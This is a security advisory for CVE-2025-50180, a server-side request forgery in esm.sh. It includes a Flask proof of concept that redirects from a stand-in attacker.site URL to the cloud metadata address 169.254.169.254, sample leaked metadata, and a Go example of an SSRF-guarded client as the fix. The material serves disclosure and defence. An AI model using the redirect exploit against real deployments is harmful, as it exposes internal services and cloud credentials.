8.7
esm.sh Allows Access to Internal Websites
CVE-2025-50180
GHSA-3c9r-837r-qqm4
Summary
A vulnerability in esm.sh allows attackers to retrieve information from internal websites. This could lead to unauthorized access to sensitive data. To fix this, update esm.sh to the latest version or use a secure configuration to restrict access to internal websites.
What to do
- Update github.com esm-dev to version 0.0.0-20250616164159-0593516c4cfa.
Affected software
| Vendor | Product | Affected versions | Fix available |
|---|---|---|---|
| github.com | esm-dev | <= 0.0.0-20250616164159-0593516c4cfa | 0.0.0-20250616164159-0593516c4cfa |
| esm | esm.sh | <= 137 | – |
Original title
esm.sh is vulnerable to full-response SSRF
Original description
### Summary
esm.sh is vulnerable to a full-response SSRF, allowing an attacker to retrieve information from internal websites through the vulnerability.
### Details
Vulnerable code location: https://github.com/esm-dev/esm.sh/blob/f80ff8c8d58749e77fa964abde468fc61f8bd89e/server/router.go#L511
If the internal address has a suffix listed below, the attacker can obtain content from the specified internal address.
e.g.: https://esm.sh/https://local.site/test.md
```
".js", ".ts", ".mjs", ".mts", ".jsx", ".tsx", ".cjs", ".cts", ".vue", ".svelte", ".md", ".css"
```
A 302 redirect can be used to bypass the suffix restriction.
e.g.: https://esm.sh/https://attacker.site/test.md
https://attacker.site/test.md 302-redirects to http://169.254.169.254/v1.json
### PoC
Use Flask to start a server that returns a 302 redirect.
```python
from flask import Flask, redirect

app = Flask(__name__)


# The path esm.sh is asked to fetch carries an allowed suffix (.md);
# the response is a 302 pointing at the internal metadata address.
@app.route('/test.md')
def redirect_test():
    return redirect("http://169.254.169.254/v1.json", code=302)


if __name__ == '__main__':
    app.run(host='0.0.0.0', port=80)
```
Let esm.sh visit this site.
https://esm.sh/https://attacker.site/test.md
The attacker can obtain data from http://169.254.169.254/v1.json.
```
var t=`<p>{"bgp":{"ipv4":{"my-address":"","my-asn":"","peer-address":"","peer-asn":""},"ipv6":{"my-address":"","my-asn":"","peer-address":"","peer-asn":""}},"hostname":"****","instance-v2-id":"****","instanceid":"****","interfaces":[{"ipv4":{"additional":[],"address":"****","gateway":"****","netmask":"****","routes":[{"netmask":32,"network":"****"}]},"ipv6":{"additional":[],"address":"****","network":"****","prefix":"64"},"mac":"****","network-type":"public"}],"nvidia-driver":[],"public-keys":["****"],"region":{"countrycode":"US","regioncode":"SJC"},"tags":[]}</p>
`,o={},u=t;export{u as default,t as html,o as meta};
```
Decoded data (redacted):
```json
{"bgp":{"ipv4":{"my-address":"","my-asn":"","peer-address":"","peer-asn":""},"ipv6":{"my-address":"","my-asn":"","peer-address":"","peer-asn":""}},"hostname":"****","instance-v2-id":"****","instanceid":"****","interfaces":[{"ipv4":{"additional":[],"address":"****","gateway":"****","netmask":"****","routes":[{"netmask":32,"network":"****"}]},"ipv6":{"additional":[],"address":"****","network":"****","prefix":"64"},"mac":"****","network-type":"public"}],"nvidia-driver":[],"public-keys":["****"],"region":{"countrycode":"US","regioncode":"SJC"},"tags":[]}
```
### Impact
An attacker can exploit the vulnerability to access internal sites, and in a cloud environment, can retrieve access keys (AK) and secret keys (SK) by accessing the metadata service address.
### Fix
It is recommended to use `safeurl.Client` as a replacement for `http.Client`.
https://github.com/esm-dev/esm.sh/blob/f80ff8c8d58749e77fa964abde468fc61f8bd89e/internal/fetch/fetch.go#L13
https://github.com/doyensec/safeurl
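The fix section above recommends swapping `http.Client` for an SSRF-aware client. The following is an added example, not esm.sh's code and not the doyensec/safeurl library, that shows with only the Go standard library what such a client has to do to close both holes described in this advisory: it refuses non-global addresses at dial time (on the resolved IP, not the host name) and re-validates every redirect hop, so a 302 from an allowed `.md` URL to `http://169.254.169.254/...` is refused instead of followed. The function names (`NewGuardedClient`, `FetchModule`, `guardedDial`, `validateTarget`) and the error values are assumptions for this illustration; the suffix list is the one quoted in the advisory.

```go
package main

import (
	"context"
	"errors"
	"fmt"
	"net"
	"net/http"
	"net/url"
	"strings"
	"time"
)

// Extension allow list quoted in the advisory. The guard applies it to every
// redirect hop, not only to the URL the user submitted.
var allowedSuffixes = []string{
	".js", ".ts", ".mjs", ".mts", ".jsx", ".tsx",
	".cjs", ".cts", ".vue", ".svelte", ".md", ".css",
}

var (
	errBlockedAddress = errors.New("ssrf guard: destination address is not allowed")
	errBadSuffix      = errors.New("ssrf guard: path suffix is not in the allow list")
	errBadScheme      = errors.New("ssrf guard: only http and https are allowed")
)

// isDisallowedIP refuses anything not globally routable: loopback, link-local
// (which covers 169.254.169.254), RFC 1918/ULA private, unspecified, multicast.
func isDisallowedIP(ip net.IP) bool {
	return ip.IsLoopback() || ip.IsLinkLocalUnicast() || ip.IsLinkLocalMulticast() ||
		ip.IsPrivate() || ip.IsUnspecified() || ip.IsMulticast()
}

// hasAllowedSuffix checks the path only, so "?x=.md" cannot satisfy the rule.
func hasAllowedSuffix(u *url.URL) bool {
	p := strings.ToLower(u.Path)
	for _, s := range allowedSuffixes {
		if strings.HasSuffix(p, s) {
			return true
		}
	}
	return false
}

// validateTarget runs on the submitted URL and on every redirect target.
// Literal IP hosts are decided here; names are decided after resolution in
// guardedDial, so a DNS name pointing at internal space is still refused.
func validateTarget(u *url.URL) error {
	if u.Scheme != "http" && u.Scheme != "https" {
		return errBadScheme
	}
	if ip := net.ParseIP(u.Hostname()); ip != nil && isDisallowedIP(ip) {
		return errBlockedAddress
	}
	if !hasAllowedSuffix(u) {
		return errBadSuffix
	}
	return nil
}

// guardedDial resolves the host, refuses if any answer is disallowed, then
// connects to the vetted IP (not the name) so a second lookup cannot rebind.
func guardedDial(ctx context.Context, network, addr string) (net.Conn, error) {
	host, port, err := net.SplitHostPort(addr)
	if err != nil {
		return nil, err
	}
	ips, err := net.DefaultResolver.LookupIPAddr(ctx, host)
	if err != nil || len(ips) == 0 {
		return nil, fmt.Errorf("ssrf guard: cannot resolve %q: %v", host, err)
	}
	for _, ipa := range ips {
		if isDisallowedIP(ipa.IP) {
			return nil, errBlockedAddress
		}
	}
	d := &net.Dialer{Timeout: 5 * time.Second}
	return d.DialContext(ctx, network, net.JoinHostPort(ips[0].IP.String(), port))
}

// checkRedirect is the check whose absence lets the 302 in the PoC succeed.
func checkRedirect(req *http.Request, via []*http.Request) error {
	if len(via) >= 3 {
		return errors.New("ssrf guard: too many redirects")
	}
	return validateTarget(req.URL)
}

// NewGuardedClient is the drop-in for a bare http.Client in fetch code.
// Proxy is deliberately left nil: a proxy would make the dial guard moot.
func NewGuardedClient() *http.Client {
	return &http.Client{
		Timeout:       15 * time.Second,
		CheckRedirect: checkRedirect,
		Transport:     &http.Transport{DialContext: guardedDial},
	}
}

// FetchModule validates the submitted URL, then fetches it through the guard.
func FetchModule(client *http.Client, raw string) (*http.Response, error) {
	u, err := url.Parse(raw)
	if err != nil {
		return nil, err
	}
	if err := validateTarget(u); err != nil {
		return nil, err
	}
	return client.Get(u.String())
}

func main() {
	// Constructed inputs mirroring the advisory; no network access is needed.
	u, _ := url.Parse("http://169.254.169.254/v1.json")
	fmt.Println("metadata URL:", validateTarget(u))
	_, err := FetchModule(NewGuardedClient(), "http://127.0.0.1:8080/test.md")
	fmt.Println("loopback fetch:", err)
}
```

Both guards are needed: the dial-time check alone does not help if an internal range is reachable through a proxy or if the allow list is only applied to the first URL, and the redirect check alone does not help when the attacker-controlled name simply resolves to an internal address.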
NVD CVSS 3.1: 7.5
NVD CVSS 4.0: 8.7
Vulnerability type: CWE-918 Server-Side Request Forgery (SSRF)
- https://nvd.nist.gov/vuln/detail/CVE-2025-50180
- https://github.com/advisories/GHSA-3c9r-837r-qqm4
- https://github.com/esm-dev/esm.sh/blob/f80ff8c8d58749e77fa964abde468fc61f8bd89e/... Patch
- https://github.com/esm-dev/esm.sh/blob/f80ff8c8d58749e77fa964abde468fc61f8bd89e/... Patch
- https://github.com/esm-dev/esm.sh/commit/0593516c4cfab49ad3b4900416a8432ff2e23eb... Patch
- https://github.com/esm-dev/esm.sh/pull/1149 Issue Tracking Patch
- https://github.com/esm-dev/esm.sh/releases/tag/v137 Product Release Notes
- https://github.com/esm-dev/esm.sh/security/advisories/GHSA-3c9r-837r-qqm4 Exploit Mitigation Patch Vendor Advisory
Published: 25 Feb 2026 · Updated: 12 Mar 2026 · First seen: 6 Mar 2026